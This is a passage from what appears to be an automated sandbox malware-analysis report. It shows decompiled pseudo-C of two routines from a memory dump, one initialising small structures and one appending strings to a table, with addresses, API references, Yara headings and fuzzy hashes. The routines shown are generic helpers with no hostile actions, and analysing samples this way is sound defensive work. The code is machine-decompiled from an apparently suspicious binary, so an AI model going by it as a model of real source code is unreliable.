					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 4)) = _t22;
				L00412090();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 8)) = _t22;
				L00412090();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				_push(0x14);
				 *((intOrPtr*)(_t31 + 0xc)) = _t22;
				L00412090();
				if(_t22 == 0) {
					_t22 = 0;
				} else {
					 *((intOrPtr*)(_t22 + 0xc)) = 0;
					 *_t22 = 0;
					 *((intOrPtr*)(_t22 + 4)) = 0;
					 *((intOrPtr*)(_t22 + 0x10)) = 0x100;
					 *((intOrPtr*)(_t22 + 8)) = 0;
				}
				 *((intOrPtr*)(_t31 + 0x10)) = _t22;
				return _t31;
			}





                                                                                                                                                                  0x00408638
                                                                                                                                                                  0x00408640
                                                                                                                                                                  0x00408646
                                                                                                                                                                  0x0040864b
                                                                                                                                                                  0x0040864d
                                                                                                                                                                  0x0040865d
                                                                                                                                                                  0x0040866f
                                                                                                                                                                  0x0040865f
                                                                                                                                                                  0x0040865f
                                                                                                                                                                  0x00408662
                                                                                                                                                                  0x00408664
                                                                                                                                                                  0x00408667
                                                                                                                                                                  0x0040866a
                                                                                                                                                                  0x0040866a
                                                                                                                                                                  0x00408671
                                                                                                                                                                  0x00408673
                                                                                                                                                                  0x00408676
                                                                                                                                                                  0x0040867e
                                                                                                                                                                  0x00408690
                                                                                                                                                                  0x00408680
                                                                                                                                                                  0x00408680
                                                                                                                                                                  0x00408683
                                                                                                                                                                  0x00408685
                                                                                                                                                                  0x00408688
                                                                                                                                                                  0x0040868b
                                                                                                                                                                  0x0040868b
                                                                                                                                                                  0x00408692
                                                                                                                                                                  0x00408694
                                                                                                                                                                  0x00408697
                                                                                                                                                                  0x0040869f
                                                                                                                                                                  0x004086b1
                                                                                                                                                                  0x004086a1
                                                                                                                                                                  0x004086a1
                                                                                                                                                                  0x004086a4
                                                                                                                                                                  0x004086a6
                                                                                                                                                                  0x004086a9
                                                                                                                                                                  0x004086ac
                                                                                                                                                                  0x004086ac
                                                                                                                                                                  0x004086b3
                                                                                                                                                                  0x004086b5
                                                                                                                                                                  0x004086b8
                                                                                                                                                                  0x004086c0
                                                                                                                                                                  0x004086d2
                                                                                                                                                                  0x004086c2
                                                                                                                                                                  0x004086c2
                                                                                                                                                                  0x004086c5
                                                                                                                                                                  0x004086c7
                                                                                                                                                                  0x004086ca
                                                                                                                                                                  0x004086cd
                                                                                                                                                                  0x004086cd
                                                                                                                                                                  0x004086d5
                                                                                                                                                                  0x004086db

                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 1860491036-0
                                                                                                                                                                  • Opcode ID: 57e6dba8ab03ca08e411dffe9121cf345b91e8e4000f6b536eec088db062ac75
                                                                                                                                                                  • Instruction ID: a93534bcf4590af08eae181cf0f7bc47295f2e33990000f3cf4a50e67893865e
                                                                                                                                                                  • Opcode Fuzzy Hash: 57e6dba8ab03ca08e411dffe9121cf345b91e8e4000f6b536eec088db062ac75
                                                                                                                                                                  • Instruction Fuzzy Hash: 8421E7B0A003008ED7519F2A9645A55FBE4FF9431072AC9AFD259CB3B2DBF9C880DB14
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                  Function 00406AA3, Relevance: 5.1, APIs: 4, Instructions: 63stringCOMMON
                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                                                  			E00406AA3(void* __eax, void* __ecx, char* _a4) {
				int _v8;
				void* __edi;
				int _t27;
				intOrPtr _t28;
				intOrPtr _t31;
				intOrPtr _t42;
				intOrPtr _t52;
				void** _t55;
				void** _t56;
				void* _t59;

				_t59 = __eax;
				_t27 = strlen(_a4);
				_t42 =  *((intOrPtr*)(_t59 + 4));
				_t52 = _t42 + _t27 + 1;
				_v8 = _t27;
				_t28 =  *((intOrPtr*)(_t59 + 0x14));
				 *((intOrPtr*)(_t59 + 4)) = _t52;
				_t55 = _t59 + 0x10;
				if(_t52 != 0xffffffff) {
					E00406104(_t59, _t52, _t55, 1, _t28);
				} else {
					free( *_t55);
				}
				_t53 =  *(_t59 + 0x1c);
				_t31 =  *((intOrPtr*)(_t59 + 0x18));
				_t56 = _t59 + 0xc;
				if( *(_t59 + 0x1c) != 0xffffffff) {
					E00406104(_t59 + 8, _t53, _t56, 4, _t31);
				} else {
					free( *_t56);
				}
				memcpy( *(_t59 + 0x10) + _t42, _a4, _v8);
				 *((char*)( *(_t59 + 0x10) + _t42 + _v8)) = 0;
				 *((intOrPtr*)( *_t56 +  *(_t59 + 0x1c) * 4)) = _t42;
				 *(_t59 + 0x1c) =  *(_t59 + 0x1c) + 1;
				_t25 =  *(_t59 + 0x1c) - 1; // -1
				return _t25;
			}













                                                                                                                                                                  0x00406aad
                                                                                                                                                                  0x00406aaf
                                                                                                                                                                  0x00406ab4
                                                                                                                                                                  0x00406ab7
                                                                                                                                                                  0x00406abe
                                                                                                                                                                  0x00406ac1
                                                                                                                                                                  0x00406ac5
                                                                                                                                                                  0x00406ac8
                                                                                                                                                                  0x00406acb
                                                                                                                                                                  0x00406adb
                                                                                                                                                                  0x00406acd
                                                                                                                                                                  0x00406acf
                                                                                                                                                                  0x00406acf
                                                                                                                                                                  0x00406ae1
                                                                                                                                                                  0x00406ae7
                                                                                                                                                                  0x00406aeb
                                                                                                                                                                  0x00406aee
                                                                                                                                                                  0x00406aff
                                                                                                                                                                  0x00406af0
                                                                                                                                                                  0x00406af2
                                                                                                                                                                  0x00406af2
                                                                                                                                                                  0x00406b12
                                                                                                                                                                  0x00406b1f
                                                                                                                                                                  0x00406b2b
                                                                                                                                                                  0x00406b2e
                                                                                                                                                                  0x00406b35
                                                                                                                                                                  0x00406b3b

                                                                                                                                                                  APIs
                                                                                                                                                                  • strlen.MSVCRT ref: 00406AAF
                                                                                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406ACF
                                                                                                                                                                    • Part of subcall function 00406104: malloc.MSVCRT ref: 00406120
                                                                                                                                                                    • Part of subcall function 00406104: memcpy.MSVCRT ref: 00406138
                                                                                                                                                                    • Part of subcall function 00406104: free.MSVCRT(00000000,00000000,76D24DE0,00406B78,00000001,?,00000000,76D24DE0,00406EF2,00000000,?,?), ref: 00406141
                                                                                                                                                                  • free.MSVCRT(?,00000001,?,00000000,?,?,00406F39,?,00000000,?,?), ref: 00406AF2
                                                                                                                                                                  • memcpy.MSVCRT ref: 00406B12
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000018.00000002.423819557.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000018.00000002.423853684.0000000000419000.00000040.00000001.sdmp Download File
                                                                                                                                                                  Yara matches
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 3669619086-0
                                                                                                                                                                  • Opcode ID: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
                                                                                                                                                                  • Instruction ID: b9d8f5a2f56f362531d37561c783707772d91941aea6ec8fb4057fc73eb697f3
                                                                                                                                                                  • Opcode Fuzzy Hash: fe556f8fd747337398a4671f90261db5b892e00cab488469f465dd59fda81595
                                                                                                                                                                  • Instruction Fuzzy Hash: A7119D72200600EFD730EF18D88199AB7F5EF48324B108A2EF556A7692C7B5FD25CB54
                                                                                                                                                                  Uniqueness

                                                                                                                                                                  Uniqueness Score: -1.00%